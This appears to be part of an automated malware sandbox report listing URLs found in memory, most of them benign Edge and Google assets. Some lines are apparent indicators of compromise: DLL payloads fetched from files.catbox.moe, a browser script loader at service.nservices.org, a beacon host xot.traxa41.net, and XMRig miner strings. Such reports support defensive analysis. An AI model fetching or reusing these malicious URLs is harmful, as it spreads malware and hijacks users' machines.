Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_ku_gou.png/1.0.3/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_last.png/1.0.3/asset
Source: 000003.log0.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?sv=2017-07-29&
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_dark.png/1.1.0/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_hc.png/1.1.0/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_light.png/1.1.0/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_naver_vibe.png/1.0.3/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_dark.png/1.4.9/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_hc.png/1.4.9/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_light.png/1.4.9/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_dark.png/1.9.10/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_hc.png/1.9.10/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_light.png/1.9.10/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_hc.png/1.1.0/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_dark.png/1.1.0/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_light.png/1.1.0/asse
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_power_point.png/1.7.32/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_qq.png/1.0.3/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_dark.png/1.1.12/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_hc.png/1.1.12/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_light.png/1.1.12/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_hc.png/1.1.3/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_dark.png/1.1.3/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_light.png/1.1.3/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_hc.png/1.3.6/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_dark.png/1.3.6/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.1.12/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.4.0/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.5.13/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.1.12/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.4.0/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.5.13/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.1.12/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.4.0/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.5.13/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_hc.png/1.4.0/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_dark.png/1.4.0/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_dark.png/1.3.20/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_hc.png/1.3.20/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_light.png/1.3.20/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_sound_cloud.png/1.0.3/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_spotify.png/1.4.12/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_dark.png/1.2.19/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_hc.png/1.2.19/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_light.png/1.2.19/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_telegram.png/1.0.4/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_hc.png/1.0.5/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_dark.png/1.0.5/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_light.png/1.0.5/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tidal.png/1.0.3/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tik_tok_light.png/1.0.5/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_hc.png/1.5.13/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_dark.png/1.5.13/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_twitter_light.png/1.0.9/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_vk.png/1.0.3/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whats_new.png/1.0.0/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whatsapp_light.png/1.4.11/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_word.png/1.7.32/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_yandex_music.png/1.0.10/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_youtube.png/1.4.14/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://excel.new?from=EdgeM365Shoreline
Source: Target.exe, 00000001.00000002.4263822421.000001D0B3FC6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://files.catbox.moe/k54
Source: Target.exe, 00000001.00000002.4116525327.000001D09B6C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://files.catbox.moe/k541xr.dll
Source: Target.exe, 00000001.00000002.4263822421.000001D0B3FC6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://files.catbox.moe/k541xr.dllJ
Source: Target.exe, 00000001.00000002.4116525327.000001D09B6C1000.00000004.00000800.00020000.00000000.sdmp, Target.exe, 00000001.00000002.4263822421.000001D0B3FC6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://files.catbox.moe/kwfxr7.dll
Source: chromecache_514.13.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey200-36dp/2x/gm_alert_gm_grey200_3
Source: chromecache_514.13.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey600-36dp/2x/gm_alert_gm_grey600_3
Source: chromecache_514.13.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey200-24dp/1x/gm_close_gm_grey200_2
Source: chromecache_514.13.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey600-24dp/1x/gm_close_gm_grey600_2
Source: svchost.exe, 00000007.00000003.1738844921.000001CC776C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: svchost.exe, 00000007.00000003.1738844921.000001CC7771A000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: svchost.exe, 00000007.00000003.1738844921.000001CC776C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: svchost.exe, 00000007.00000003.1738844921.000001CC776A3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1738844921.000001CC776C2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1738844921.000001CC776F4000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1738844921.000001CC776E8000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1738844921.000001CC77707000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000007.00000003.1738844921.000001CC776C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://gaana.com/
Source: zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9D12000.00000004.00000800.00020000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1676626747.000001DFC1DB0000.00000004.08000000.00040000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9C49000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9D12000.00000004.00000800.00020000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1676626747.000001DFC1DB0000.00000004.08000000.00040000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9C49000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9D12000.00000004.00000800.00020000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1676626747.000001DFC1DB0000.00000004.08000000.00040000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9C49000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://i.y.qq.com/n2/m/index.html
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://latest.web.skype.com/?browsername=edge_canary_shoreline
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://m.kugou.com/
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://m.soundcloud.com/
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://m.vk.com/
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://mail.google.com/mail/mu/mp/266/#tl/Inbox
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://manifestdeliveryservice.edgebrowser.microsoft-staging-falcon.io/app/page-context-demo
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://music.amazon.com
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://music.apple.com
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://music.yandex.com
Source: 4cb013792b196a35_0.10.dr String found in binary or memory: https://ntp.msn.com
Source: 4cb013792b196a35_1.10.dr String found in binary or memory: https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&enableNetworkFirs
Source: 4cb013792b196a35_0.10.dr String found in binary or memory: https://ntp.msn.comService-Worker-Allowed:
Source: svchost.exe, 00000007.00000003.1738844921.000001CC776C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: svchost.exe, 00000007.00000003.1738844921.000001CC77656000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://open.spotify.com
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://outlook.live.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://outlook.live.com/mail/0/
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://outlook.live.com/mail/compose?isExtension=true
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://outlook.office.com/mail/0/
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://outlook.office.com/mail/compose?isExtension=true
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://outlook.office.com/mail/inbox?isExtension=true&sharedHeader=1&client_flight=outlookedge
Source: chromecache_514.13.dr String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: chromecache_520.13.dr String found in binary or memory: https://plus.google.com
Source: chromecache_520.13.dr String found in binary or memory: https://plus.googleapis.com
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://powerpoint.new?from=EdgeM365Shoreline
Source: zcezeaqsuhi.exe, 00000002.00000002.2017176866.000002A5BB72A000.00000004.00000800.00020000.00000000.sdmp, zcezeaqsuhi.exe, 00000002.00000002.2017176866.000002A5BB73E000.00000004.00000800.00020000.00000000.sdmp, injected-script.js.2.dr String found in binary or memory: https://service.nservices.org/api/browser/GetScript?id=$
Source: zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9D12000.00000004.00000800.00020000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1676626747.000001DFC1DB0000.00000004.08000000.00040000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9C49000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9D12000.00000004.00000800.00020000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1666984608.000001DFA9511000.00000004.00000800.00020000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1676626747.000001DFC1DB0000.00000004.08000000.00040000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9C49000.00000004.00000800.00020000.00000000.sdmp, Target.exe, 00000001.00000002.4116525327.000001D09B6C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9D12000.00000004.00000800.00020000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1676626747.000001DFC1DB0000.00000004.08000000.00040000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9C49000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://tidal.com/
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://twitter.com/
Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.10.dr String found in binary or memory: https://unitedstates1.ss.wd.microsoft.us/
Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.10.dr String found in binary or memory: https://unitedstates2.ss.wd.microsoft.us/
Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.10.dr String found in binary or memory: https://unitedstates4.ss.wd.microsoft.us/
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://vibe.naver.com/today
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://web.skype.com/?browsername=edge_canary_shoreline
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://web.skype.com/?browsername=edge_stable_shoreline
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://web.telegram.org/
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://web.whatsapp.com
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://word.new?from=EdgeM365Shoreline
Source: chromecache_520.13.dr String found in binary or memory: https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://www.deezer.com/
Source: content.js.10.dr, content_new.js.10.dr String found in binary or memory: https://www.google.com/chrome
Source: chromecache_520.13.dr String found in binary or memory: https://www.googleapis.com/auth/plus.me
Source: chromecache_520.13.dr String found in binary or memory: https://www.googleapis.com/auth/plus.people.recommended
Source: chromecache_514.13.dr String found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
Source: chromecache_514.13.dr String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
Source: chromecache_514.13.dr String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://www.iheart.com/podcast/
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://www.instagram.com
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://www.last.fm/
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://www.messenger.com
Source: 4cb013792b196a35_1.10.dr String found in binary or memory: https://www.msn.com/web-notification-icon-light.png
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&game
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&item
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&item=fl
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&playInS
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://www.office.com
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshoreline
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=1
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=2
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=1
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=2
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://www.tiktok.com/
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://www.youtube.com
Source: Target.exe, 00000001.00000002.4137105635.000001D0AC25F000.00000004.00000800.00020000.00000000.sdmp, AddInProcess.exe, 00000014.00000002.4110650202.0000000140465000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://xmrig.com/benchmark/%s
Source: Target.exe, 00000001.00000002.4137105635.000001D0AC25F000.00000004.00000800.00020000.00000000.sdmp, AddInProcess.exe, 00000014.00000002.4110650202.0000000140465000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://xmrig.com/docs/algorithms
Source: Target.exe, 00000001.00000002.4137105635.000001D0AC25F000.00000004.00000800.00020000.00000000.sdmp, AddInProcess.exe, 00000014.00000002.4110650202.0000000140465000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://xmrig.com/wizard
Source: Target.exe, 00000001.00000002.4137105635.000001D0AC25F000.00000004.00000800.00020000.00000000.sdmp, AddInProcess.exe, 00000014.00000002.4110650202.0000000140465000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://xmrig.com/wizard%s
Source: zcezeaqsuhi.exe, 00000002.00000002.2017176866.000002A5BB6DA000.00000004.00000800.00020000.00000000.sdmp, 2cc80dabc69f58b6_0.10.dr, background.js.2.dr, 2cc80dabc69f58b6_1.10.dr String found in binary or memory: https://xot.traxa41.net
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://y.music.163.com/m/
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49983
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown Network traffic detected: HTTP traffic on port 49932 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown Network traffic detected: HTTP traffic on port 49772 -> 443
